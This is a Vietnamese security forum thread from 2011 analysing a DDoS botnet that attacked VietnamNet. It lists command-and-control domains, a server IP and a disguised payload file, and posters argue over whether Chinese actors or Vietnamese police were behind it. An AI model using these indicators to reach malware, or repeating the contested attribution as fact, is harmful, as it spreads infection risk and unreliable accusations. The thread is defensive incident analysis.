2- Ở đây chúng ta cần phân biệt hai nhóm website-webserver
- Nhóm thứ nhất gồm 4 website:
http://wide.ircop.cn
http://pref.firebay.cn
http://daily.leteaks.com
http://link.susaks.com


- Nhóm thứ hai chỉ có một website -webserver là:
http://option.drfound.net

Website của nhóm website-webserver thứ hai chứa một file (tại webroot) có tên là k113.css (dung lương 1.030KB). File này, như anh TQN đã RCE (với PEid 0.95- dùng một plugin phù hợp), chứa 2 file là iTunesHelper.exe và iTunesHelper-tray.exe. iTunesHelper.exe này chính là 1 DDoS tool của STL (đã qua thử nghiệm thưc tế trên server thử nghiệm của tôi)

Websites của nhóm website-webserver thứ nhất mới là các master website-webserver điều khiển các cuộc tấn công DDoS vào mục tiêu. Trên các website này chứa các file .txt được mã hoá, hướng dẫn DDoS tool thay đổi mục tiêu tấn công (tên miền, đia chỉ IP, đia chỉ URL...).... Cần lưu ý là trong quá trình iTunesHelper.exe tấn công DDoS vao VIETNAMNET nó thường xuyên kết nôi với master website-webserver này.

3- Có gì khác nhau giữa hai đia chỉ:
host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (do tôi xác định) và:
Code:
http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net
do anh TQN xác định?
Không có gì khác nhau cả.
host-200-74-244-198.ccipanama.com là hostname (computer name) của webserver. Webserver này có IP tĩnh là 200.74.244.198. Tất cả 4 website http://wide.ircop.cn, http://pref.firebay.cn, http://daily.leteaks.com, http://link.susaks.com đều đang hosting (đặt) trên webserver này.
Khi khởi phát trong hệ thống thì iTunesHelper.exe luôn kết nối đầu tiên với webserver nói trên.

4- Như đã phân tích webserver này đặt tại PANAMA (Trung Mỹ)
Webserver chỉ cài một trình quản lý WEB là NGINX và bình thường các website trên nó chỉ có một file duy nhất là index.html với dòng chữ "ls-lia!" (không hiểu cấp trên của STL viết gì). Khi cần thiết các website trên webserver cùng upload các file .txt (đươc mã hoá) có nội dung giống nhau để update thông tin cho các DDoS tool, nằm trong các zombies trên mạng.
Chắc chắn là webserver này đươc thiết lập chỉ nhằm mục đích điều khiển các cuộc tấn công DDoS, có thể trên phạm vi toàn cầu, không hẳn chỉ nhằm vào VIETNAMNET. Nhưng trong thời gian này nó "ưu tiên" cho mục tiêu VIETNAMNET.
Mục tiêu tấn công là phải phục vụ cho "đường lối, mục tiêu chính trị' mà cấp trên chỉ đạo. Hì hì.

Có người thắc mắc là sao một website với domain có hậu tố là .cn (China) lai được phép đặt ở nước ngoài. Câu trả lời là: Không rõ TQ có luật không cho phép các website của các cơ quan nhà nước đặt trên các webserver đặt tai nước ngoài, như ở VN, hay không?. Giả dụ nếu có, thì các lãnh đạo của STL sẽ tuyên bố:
wide.ircop.cn, pref.firebay.cnchỉ là của tư nhân. Vả lai đã là việc của nhà nước, thì làm gì chả được, kể cả việc đó có vi phạm luật lệ hiện hành.

5- Như ta đã biết, các cấp trên của STL đang cho mang bot tấn công vào VIETNAMNET theo 2 hướng:
- Tấn công vào mọi website (với các domain khác nhau) của VIETNAMNET
- Tấn công vào kết cấu hạ tầng mạng của VIETNAMNET
Thí dụ:
- iTunesHelper.exe tấn công vào cả vietnamweek.net (Tuần Việt nam) . Đây là một webserver của vietnamnet đặt tai Mỹ có IP là 209.160.52.52.

Action:Monitored
Application:iTunesHelper.exe
Access:Outbound TCP access
Object:1580 -> 209.160.52.52:80 (http)----> vietnamweek.net
Interface:[1] Compaq NC3131 Fast Ethernet NIC
Time:8/30/2011 7:12:31 AM


- iTunesHelper.exe cũng tấn công vào địa chỉ: 15.14.91.183-ftth.cmcti.vn (IP là 183.91.14.15, trong IP network 183.91.14.0/23) là route thuộc kết cấu hạ tầng cung cấp kết nối Internet cho tuanvietnam.net.

6- Những sự việc liên quan đến việc tấn công DDoS vao VIETNAMNET vừa qua, mà HVA đã phân tích, chứng tỏ đã có sự tham gia (can dự) của nhóm thành viên lãnh đạo của STL và họ là người TQ. Những công việc phức tạp đòi hỏi một nền tảng kỹ thuật mạng khá cao, như việc điều khiển, thiết lập, định kỳ ngừng hay đưa vào sử dụng các dedicated master-webserver đặt ở nhiều nơi trên TG (có cả PANAMA)... thì phải do các cấp lãnh đạo STL mới có khả năng và quyền hạn làm được. Mấy cậu STL tai VN chắc không thể có khả năng và/hoặc quyền hạn để làm.

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?



Ngay sau khi kích hoạt, iTunesHelper.exe kết nối đầu tiên với master-webserver



Vị trí địa lý, IP và hostname của master webserver




Vị trí địa lý, IP và hostname của option.drfound.net



Cuộc tấn công DDoS mới nhất (sáng nay) vào vietnamnet

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 10:55:52 (+0700) | #772 | 246195
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Trong 4 cái link trên của IAStore thì thấy có 2 cái đặt ở Parkistan, 2 cái ở US. Bà con kiểm tra thử !
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 11:25:01 (+0700) | #773 | 246198
texudo
Member

[Minus]    0    [Plus]
Joined: 20/07/2011 11:14:04
Messages: 31
Offline
[Profile] [PM]

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?


 


Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 13:41:43 (+0700) | #774 | 246217
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

chieutuongtu wrote:
Em theo dõi topic thấy anh TQN có viết, đại ý: k vào được blogspot của gg = máy bị nhiễm STL's "mèo què".

Lúc em vào blogspot thì nó ra thông báo này.




Vậy xin hỏi cụ thể em phải làm j để giúp các anh lấy mẫu?

PS: e đang ở trường. 


Cụ thể là bạn scan và gửi 3 log Autoruns, Autorunsc (Autoruns command-line) và TCPView cho mình theo đúng hướng dẫn ở các bài viết sau:

Hướng dẫn scan và gửi log Autoruns
http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/

Hướng dẫn scan và gửi log Autorunsc (Autoruns command-line)
http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autorunsc-(autoruns-command-line)/

Hướng dẫn scan và gửi log TCPView
http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-log-tcpview/
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 14:08:30 (+0700) | #775 | 246218
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

texudo wrote:

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?


 


Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích. 


Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác.

Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 14:11:41 (+0700) | #776 | 246219
Mr Ghost
Member

[Minus]    0    [Plus]
Joined: 23/06/2011 03:19:31
Messages: 2
Offline
[Profile] [PM]
@PXMMRF: Về việc các server đặt tại Panama hay UA hay ở RUS đều do các nhà cung cấp có các tuỳ chọn thanh toán thông qua Webmoney hay LR. Những cổng thanh toán này không cần xác thực danh tính người mua và nơi bán cũng chằng quan tâm đến người mua dùng server này để làm gì... Có tiền thanh toán thì bất kể người nào mua cũng được. smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 14:27:37 (+0700) | #777 | 246221
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

Mr Ghost wrote:
@PXMMRF: Về việc các server đặt tại Panama hay UA hay ở RUS đều do các nhà cung cấp có các tuỳ chọn thanh toán thông qua Webmoney hay LR. Những cổng thanh toán này không cần xác thực danh tính người mua và nơi bán cũng chằng quan tâm đến người mua dùng server này để làm gì... Có tiền thanh toán thì bất kể người nào mua cũng được. smilie  


Không phải thế đâu!

Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network.

Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD.
IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có.

Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 15:48:14 (+0700) | #778 | 246223
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]

PXMMRF wrote:


Vị trí đia lý của một webserver cơ bản dưa vào vị trí của IP network.

Tôi sử dụng một phần mềm chuyên dùng của một công ty. Công ty này có một cơ sở dữ liệu rất lớn, thu gom thông tin IP network của các quốc gia trên TG và luôn đươc cập nhật. Giá mua cơ sở dữ liệu đầy đủ và luôn được cập nhật lên tới vài ngàn USD.
IP network database của tôi đã cũ (xin được, không có tiền mua) nên luôn phải đối chiếu, so sánh với các nguồn thông tin khác, kể cả check vào website tìm vài thông tin liên quan, nếu may thì có.

Vì vậy việc xác dịnh chính xác vị trí địa lý một IP hay một webserver trong không ít trường hợp không dễ chút nào. Sai sót có thể xảy ra. 


Anh có thể dùng ip2location.com để xác định địa chỉ vật lý của ip. Trang web này cung cấp thông tin về ip khá uy tín, 1 database full info của nó cũng tầm 1599/server
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 16:18:21 (+0700) | #779 | 246226
Mr Ghost
Member

[Minus]    0    [Plus]
Joined: 23/06/2011 03:19:31
Messages: 2
Offline
[Profile] [PM]
Mình để ý khá nhiều server STL đang dùng đều được mua ở những nơi được thanh toán bằng LR và Webmoney. Những nơi này không quan trọng khách hàng mình sử dụng nhằm mục đích gì ( có thể spam, adult hay phát tán virus hoặc dùng làm bàn đạp tấn công các site khác....)

Ví dụ như cái server/VPS Panama của STL trên thì có thể được mua ở đây:

Code:
http://www.ccihosting.com/servers.php?tab=linux_offshore_server
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 16:22:39 (+0700) | #780 | 246227
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

PXMMRF wrote:

texudo wrote:

PXMMRF wrote:

Có bạn trong một bài viết trong topic nay vẩn còn cho, hay ám chỉ là các CA mạng Việt nam tổ chức tấn công DDoS vừa qua trên mang, hay cho là các thành viên STL là CA mạng VN thì có lẽ họ không đọc kỹ các bài viết trong topic này, hay đọc mà không hiểu. Chẳng lẽ CA mạng VN lại tấn công liên tục, ác liệt vào VIETNAMNET, một cơ quan truyền thông quan trong của nhà nước, chính quyền VN à?


 


Thực ra xác định ai là người chủ đạo tấn cống VNN đã khá rõ ràng rồi, nhưng nói CA mạng VN không dính dáng tới thì là chưa chắc chắn. VN bây giờ nhiều phe phái, bè cánh và lợi ích. 


Có thể có phe phái, nhóm lơi ích. Nhưng thưc tế không có phe nhóm nào lai dám, hay dại gì làm các hành động ảnh hưởng đến kết cấu hạ tầng vật chất, kỹ thuật của đất nước (cũng là của nhân dân với tư cách là người đóng thuế để xây dựng các hạ tầng ấy). Nếu hành động, họ (phe, nhóm) chỉ có thể làm các việc khác.

Nếu có một số người làm tay sai cho nước ngoài, phá hoại đất nước, thì đó lai là chuyện hoàn toàn khác. Nghĩa là họ không còn nằm trong các phe nhóm khác nhau trong nôi bộ một đất nước, một nhà nước. Mà họ đã thuôc một thế lưc ngoại bang.

 


Chào anh PXMMRF,

Trong quá trình điều tra, em chưa hề thấy bất cứ một trao đổi hoặc thông tin liên lạc giữa các thành viên stl dùng tiếng Hoa cả. Tất cả đều liên lạc bằng tiếng Việt và họ dùng tiếng Việt cực kỳ đặc thù của người Việt chớ chẳng phải loại tiếng Việt của người ngoại quốc. Nếu những thành viên stl này là người Hoa nhưng dùng tiếng Việt cỡ như vậy thì họ phải là lực lượng cực kỳ đặc biệt. Em có một số người bạn gốc Hoa, sinh tại Việt Nam, họ nói tiếng Việt như người Việt nhưng không thể dùng văn viết như người Việt. Hơn nữa, từ cuối 2009 đến nay, có quá nhiều thông tin (IP, emails, traces....) về stl có nguồn đi từ Việt Nam. Chính McAfee và Google đã xác định việc này. Chính secureworks cũng đã đặt tên botnet đầu tiên của stl là "vecebot" để ám chỉ nguồn xuất phát là từ Việt Nam.

Thêm một thông tin quan trọng nữa, từ lúc stl rùm beng trên mạng, họ liên tục đánh phá các trang web, các blogs lề trái. Cho đến khi vietnamnet, cụ thể là trang tuanvietnam bắt đầu gởi một số bài khá trung dung (nhưng không có lợi cho chính phủ và Đảng) thì họ (vietnamnet) bị tấn công. TQ không việc gì phải "dập" các trang lề trái từ hồi 2009. Nếu xét về mặt kỹ thuật, các botnets của TQ nếu cần ra tay thì không có một site nào của Việt Nam hoặc bất cứ quốc gia nào trên thế giới có thể sống nổi. Họ thừa tiền bạc, thừa kỹ thuật để làm chuyện này nhưng xét tổng thể thì họ chẳng có lý do gì phải dập các trang lề trái, kể cả những blogs lè tè của người Việt. Chính báo chí của TQ đã chính thức đăng những thông tin còn dung hại gấp trăm lần thì không việc gì họ phải làm những động thái bóp miệng những trang blogs của người Việt hết.

Nếu stl là tay sai của thế lực nào đó của ngoại bang, tại sao những nguồn thông tin chính thức và các cơ quan chức năng hoàn toàn im lặng? Tại sao "trung tâm an ninh mạng" to lớn như vậy hoàn toàn im hơi lặng tiếng? Tại sao cho đến bây giờ, vietnamnet vẫn bị tấn công và từ hồi đầu 2010, khi vietnamnet bị tấn công vẫn hoàn toàn không có bất cứ một thông tin nào chính thức công bố về những hoạt động trái với pháp luật của nhóm tấn công? Nước Việt Nam không đủ sức truy lùng và lên tiếng về những hành vi phạm pháp và đen tối của thế lực ngoại bang kia sao?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|